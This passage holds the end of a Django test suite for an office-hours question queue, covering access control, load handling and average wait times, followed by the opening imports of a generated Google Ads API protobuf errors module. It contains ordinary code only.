self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.client.credentials()  # clear the auth header to simulate an anonymous client
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": 1}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_student_cannot_answer_questions(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": 1}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_ta_answer_queue_of_two_questions(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
question_id_one = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_one}, format="json")
self.assertEquals("my question 2", self.queue.questions.values()[0]["description"])
self.assertEquals(1, len(self.queue.questions.values()))
question_id_two = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_two}, format="json")
self.assertEquals(0, len(self.queue.questions.values()))
def test_ta_cannot_answer_not_valid_queue(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "random", "question_id": 1}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_ta_cannot_answer_not_valid_question_id(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": 15}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
# edit questions
def test_can_edit_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
question_id = str(self.queue.questions.values()[0]["id"])
response = self.client.put('/api/v1/queue/question/' + question_id + '/edit/',
{"description": "new question"}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals("new question", self.queue.questions.values()[0]["description"])
def test_anon_cannot_edit_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
question_id = str(self.queue.questions.values()[0]["id"])
self.client.credentials()
response = self.client.put('/api/v1/queue/question/' + question_id +'/edit/', {"description": "new question"}, format="json")
self.assertEquals(401, response.status_code)
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
def test_other_student_cannot_edit(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
question_id = str(self.queue.questions.values()[0]["id"])
self.generate_header(self.student_user_two)
response = self.client.put('/api/v1/queue/question/' + question_id + '/edit/', {"description": "new question"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals("my question", self.queue.questions.values()[0]["description"])
def test_edit_non_existent_question(self):
self.generate_header(self.student_user)
response = self.client.put('/api/v1/queue/question/15/edit/', {"description": "new question"}, format="json")
self.assertFalse(json.loads(response.content)["success"])
# delete questions
def test_user_can_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals(0, len(self.queue.questions.values()))
def test_ta_can_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.generate_header(self.ta_user)
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertTrue(json.loads(response.content)["success"])
self.assertEquals(0, len(self.queue.questions.values()))
def test_anon_cannot_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.client.credentials()
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_other_user_cannot_delete_question(self):
self.generate_header(self.student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertFalse(json.loads(response.content)["success"])
self.assertEquals(1, len(self.queue.questions.values()))
def test_delete_with_multiple_questions(self):
self.generate_header(self.student_user)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
self.generate_header(self.student_user_two)
response = self.client.post('/api/v1/queue/main/ask/', {"description": "my question 2"}, format="json")
self.assertEquals(2, len(self.queue.questions.values()))
question_id = self.queue.questions.values()[0]["id"]
self.generate_header(self.student_user)
response = self.client.post('/api/v1/questions/delete/', {"question_id": question_id}, format="json")
self.assertEquals(1, len(self.queue.questions.values()))
self.assertEquals("my question 2", self.queue.questions.values()[0]["description"])
class LoadHandlingTests(TestCase):
@freeze_time("2018-12-31 21:00:01", tick=True)
def setUp(self):
self.client = APIClient()
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
for i in range(50):
self.new_student_ask_question()
def gen_random_string(self, length):
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
def generate_header(self, user):
token, _ = Token.objects.get_or_create(user=user)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
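# register a random student, authenticate as them, and post a question to the main queue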
def new_student_ask_question(self):
username = self.gen_random_string(8)
first_name = self.gen_random_string(8)
last_name = self.gen_random_string(8)
password = self.gen_random_string(10)
student_user = StudentUser.objects.create(
username=username,
email=username + "@upenn.edu",
first_name=first_name,
last_name=last_name,
password=password
)
student_user.set_password(password)
student_user.is_active = True
student_user.save()
self.generate_header(student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
@freeze_time("2018-12-31 21:00:01", tick=True)
def test_queue_can_handle_lot_of_questions(self):
self.assertEquals(50, len(self.queue.questions.values()))
@freeze_time("2018-12-31 21:00:01", tick=True)
def test_queue_maintains_order(self):
prev_question = None
for question in self.queue.questions.values():
if prev_question is not None:
self.assertTrue(question["ask_date"] > prev_question["ask_date"])
prev_question = question
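# Average wait time tests: freezegun advances the clock between asks and answers
# so that each question's wait is deterministic.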
class AverageWaitTimeTesting(TestCase):
def setUp(self):
self.client = APIClient()
self.queue = OHQueue.objects.create(name="main", monday_times="4:00pm-6:00pm")
self.ta_user = StudentUser.objects.create(username="ta", email="ta@upenn.edu", first_name="ta",
last_name="smith", password="testing123")
self.ta_user.set_password("testing123")
self.ta_user.is_active = True
self.ta_user.is_ta = True
self.ta_user.save()
self.freezer = freeze_time("2018-12-31 21:00:01")
self.freezer.start()
def gen_random_string(self, length):
return ''.join(random.choice(string.ascii_lowercase) for _ in range(length))
def generate_header(self, user):
token, _ = Token.objects.get_or_create(user=user)
self.client.credentials(HTTP_AUTHORIZATION='Token ' + token.key)
def new_student_ask_question(self):
username = self.gen_random_string(8)
first_name = self.gen_random_string(8)
last_name = self.gen_random_string(8)
password = self.gen_random_string(10)
student_user = StudentUser.objects.create(
username=username,
email=username + "@upenn.edu",
first_name=first_name,
last_name=last_name,
password=password
)
student_user.set_password(password)
student_user.is_active = True
student_user.save()
self.generate_header(student_user)
self.client.post('/api/v1/queue/main/ask/', {"description": "my question"}, format="json")
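# answer the question at the front of the queue as the TA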
def answer_top_question(self):
question_id_one = (self.queue.questions.values()[0]["id"])
self.generate_header(self.ta_user)
self.client.post('/api/v1/questions/answer/',
{"queue": "main", "question_id": question_id_one}, format="json")
def test_wait_time_is_init_zero(self):
self.assertEquals(0, self.queue.average_wait_time)
def test_one_question_wait_time_is_zero(self):
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(0, self.queue.average_wait_time)
def test_two_question_wait_time_is_half(self):
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(.5, self.queue.average_wait_time)
def test_three_question_wait_time_is_one(self):
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:04:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(1, self.queue.average_wait_time)
def test_four_question_wait_time_is_three_point_two(self):
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:04:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:14:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(3.2, self.queue.average_wait_time)
def test_after_one_hour_average_reset(self):
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:01:01")
self.freezer.start()
self.answer_top_question()
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 21:02:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(.5, self.queue.average_wait_time)
self.new_student_ask_question()
self.freezer.stop()
self.freezer = freeze_time("2018-12-31 22:04:01")
self.freezer.start()
self.answer_top_question()
self.queue = OHQueue.objects.get(name="main")
self.assertEquals(0, self.queue.average_wait_time)
hexsha: 98ef59cbc1344f9834b9ab69a326309e855d4512 | size: 171,040 | ext: py | lang: Python
path: google/ads/google_ads/v3/proto/errors/errors_pb2.py
repo: jphanwebstaurant/google-ads-python @ 600812b2afcc4d57f00b47dfe436620ce50bfe9b | licenses: ["Apache-2.0"]
stars: 1 (2019-11-30T23:42:39.000Z to 2019-11-30T23:42:39.000Z) | issues: null | forks: 1 (2020-09-30T17:04:06.000Z to 2020-09-30T17:04:06.000Z)
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads_v3/proto/errors/errors.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.ads.google_ads.v3.proto.common import policy_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_policy__pb2
from google.ads.google_ads.v3.proto.common import value_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_common_dot_value__pb2
from google.ads.google_ads.v3.proto.errors import access_invitation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_access__invitation__error__pb2
from google.ads.google_ads.v3.proto.errors import account_budget_proposal_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_account__budget__proposal__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_customizer_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__customizer__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_ad_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__ad__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_bid_modifier_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__bid__modifier__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_group_feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__group__feed__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_parameter_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__parameter__error__pb2
from google.ads.google_ads.v3.proto.errors import ad_sharing_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_ad__sharing__error__pb2
from google.ads.google_ads.v3.proto.errors import adx_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_adx__error__pb2
from google.ads.google_ads.v3.proto.errors import asset_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__error__pb2
from google.ads.google_ads.v3.proto.errors import asset_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_asset__link__error__pb2
from google.ads.google_ads.v3.proto.errors import authentication_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authentication__error__pb2
from google.ads.google_ads.v3.proto.errors import authorization_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_authorization__error__pb2
from google.ads.google_ads.v3.proto.errors import bidding_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__error__pb2
from google.ads.google_ads.v3.proto.errors import bidding_strategy_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_bidding__strategy__error__pb2
from google.ads.google_ads.v3.proto.errors import billing_setup_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_billing__setup__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_budget_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__budget__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_draft_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__draft__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_experiment_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__experiment__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__feed__error__pb2
from google.ads.google_ads.v3.proto.errors import campaign_shared_set_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_campaign__shared__set__error__pb2
from google.ads.google_ads.v3.proto.errors import change_status_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_change__status__error__pb2
from google.ads.google_ads.v3.proto.errors import collection_size_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_collection__size__error__pb2
from google.ads.google_ads.v3.proto.errors import context_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_context__error__pb2
from google.ads.google_ads.v3.proto.errors import conversion_action_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__action__error__pb2
from google.ads.google_ads.v3.proto.errors import conversion_adjustment_upload_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__adjustment__upload__error__pb2
from google.ads.google_ads.v3.proto.errors import conversion_upload_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_conversion__upload__error__pb2
from google.ads.google_ads.v3.proto.errors import country_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_country__code__error__pb2
from google.ads.google_ads.v3.proto.errors import criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import currency_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_currency__code__error__pb2
from google.ads.google_ads.v3.proto.errors import custom_interest_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_custom__interest__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_client_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__client__link__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__feed__error__pb2
from google.ads.google_ads.v3.proto.errors import customer_manager_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_customer__manager__link__error__pb2
from google.ads.google_ads.v3.proto.errors import database_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_database__error__pb2
from google.ads.google_ads.v3.proto.errors import date_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__error__pb2
from google.ads.google_ads.v3.proto.errors import date_range_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_date__range__error__pb2
from google.ads.google_ads.v3.proto.errors import distinct_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_distinct__error__pb2
from google.ads.google_ads.v3.proto.errors import enum_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_enum__error__pb2
from google.ads.google_ads.v3.proto.errors import extension_feed_item_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__feed__item__error__pb2
from google.ads.google_ads.v3.proto.errors import extension_setting_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_extension__setting__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_attribute_reference_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__attribute__reference__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_item_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_item_target_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__target__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_item_validation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__item__validation__error__pb2
from google.ads.google_ads.v3.proto.errors import feed_mapping_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_feed__mapping__error__pb2
from google.ads.google_ads.v3.proto.errors import field_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__error__pb2
from google.ads.google_ads.v3.proto.errors import field_mask_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_field__mask__error__pb2
from google.ads.google_ads.v3.proto.errors import function_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__error__pb2
from google.ads.google_ads.v3.proto.errors import function_parsing_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_function__parsing__error__pb2
from google.ads.google_ads.v3.proto.errors import geo_target_constant_suggestion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_geo__target__constant__suggestion__error__pb2
from google.ads.google_ads.v3.proto.errors import header_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_header__error__pb2
from google.ads.google_ads.v3.proto.errors import id_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_id__error__pb2
from google.ads.google_ads.v3.proto.errors import image_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_image__error__pb2
from google.ads.google_ads.v3.proto.errors import internal_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_internal__error__pb2
from google.ads.google_ads.v3.proto.errors import invoice_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_invoice__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_ad_group_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__ad__group__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_campaign_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__campaign__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_idea_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__idea__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_keyword_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__keyword__error__pb2
from google.ads.google_ads.v3.proto.errors import keyword_plan_negative_keyword_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_keyword__plan__negative__keyword__error__pb2
from google.ads.google_ads.v3.proto.errors import label_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_label__error__pb2
from google.ads.google_ads.v3.proto.errors import language_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_language__code__error__pb2
from google.ads.google_ads.v3.proto.errors import list_operation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_list__operation__error__pb2
from google.ads.google_ads.v3.proto.errors import manager_link_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_manager__link__error__pb2
from google.ads.google_ads.v3.proto.errors import media_bundle_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__bundle__error__pb2
from google.ads.google_ads.v3.proto.errors import media_file_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__file__error__pb2
from google.ads.google_ads.v3.proto.errors import media_upload_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_media__upload__error__pb2
from google.ads.google_ads.v3.proto.errors import multiplier_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_multiplier__error__pb2
from google.ads.google_ads.v3.proto.errors import mutate_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__error__pb2
from google.ads.google_ads.v3.proto.errors import mutate_job_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_mutate__job__error__pb2
from google.ads.google_ads.v3.proto.errors import new_resource_creation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_new__resource__creation__error__pb2
from google.ads.google_ads.v3.proto.errors import not_empty_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__empty__error__pb2
from google.ads.google_ads.v3.proto.errors import not_whitelisted_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_not__whitelisted__error__pb2
from google.ads.google_ads.v3.proto.errors import null_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_null__error__pb2
from google.ads.google_ads.v3.proto.errors import offline_user_data_job_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_offline__user__data__job__error__pb2
from google.ads.google_ads.v3.proto.errors import operation_access_denied_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operation__access__denied__error__pb2
from google.ads.google_ads.v3.proto.errors import operator_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_operator__error__pb2
from google.ads.google_ads.v3.proto.errors import partial_failure_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_partial__failure__error__pb2
from google.ads.google_ads.v3.proto.errors import payments_account_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_payments__account__error__pb2
from google.ads.google_ads.v3.proto.errors import policy_finding_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__finding__error__pb2
from google.ads.google_ads.v3.proto.errors import policy_validation_parameter_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__validation__parameter__error__pb2
from google.ads.google_ads.v3.proto.errors import policy_violation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_policy__violation__error__pb2
from google.ads.google_ads.v3.proto.errors import query_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_query__error__pb2
from google.ads.google_ads.v3.proto.errors import quota_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_quota__error__pb2
from google.ads.google_ads.v3.proto.errors import range_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_range__error__pb2
from google.ads.google_ads.v3.proto.errors import reach_plan_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_reach__plan__error__pb2
from google.ads.google_ads.v3.proto.errors import recommendation_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_recommendation__error__pb2
from google.ads.google_ads.v3.proto.errors import region_code_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_region__code__error__pb2
from google.ads.google_ads.v3.proto.errors import request_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_request__error__pb2
from google.ads.google_ads.v3.proto.errors import resource_access_denied_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__access__denied__error__pb2
from google.ads.google_ads.v3.proto.errors import resource_count_limit_exceeded_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_resource__count__limit__exceeded__error__pb2
from google.ads.google_ads.v3.proto.errors import setting_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_setting__error__pb2
from google.ads.google_ads.v3.proto.errors import shared_criterion_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__criterion__error__pb2
from google.ads.google_ads.v3.proto.errors import shared_set_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_shared__set__error__pb2
from google.ads.google_ads.v3.proto.errors import size_limit_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_size__limit__error__pb2
from google.ads.google_ads.v3.proto.errors import string_format_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__format__error__pb2
from google.ads.google_ads.v3.proto.errors import string_length_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_string__length__error__pb2
from google.ads.google_ads.v3.proto.errors import time_zone_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_time__zone__error__pb2
from google.ads.google_ads.v3.proto.errors import url_field_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_url__field__error__pb2
from google.ads.google_ads.v3.proto.errors import user_data_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__data__error__pb2
from google.ads.google_ads.v3.proto.errors import user_list_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_user__list__error__pb2
from google.ads.google_ads.v3.proto.errors import youtube_video_registration_error_pb2 as google_dot_ads_dot_googleads__v3_dot_proto_dot_errors_dot_youtube__video__registration__error__pb2
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads_v3/proto/errors/errors.proto',
package='google.ads.googleads.v3.errors',
syntax='proto3',
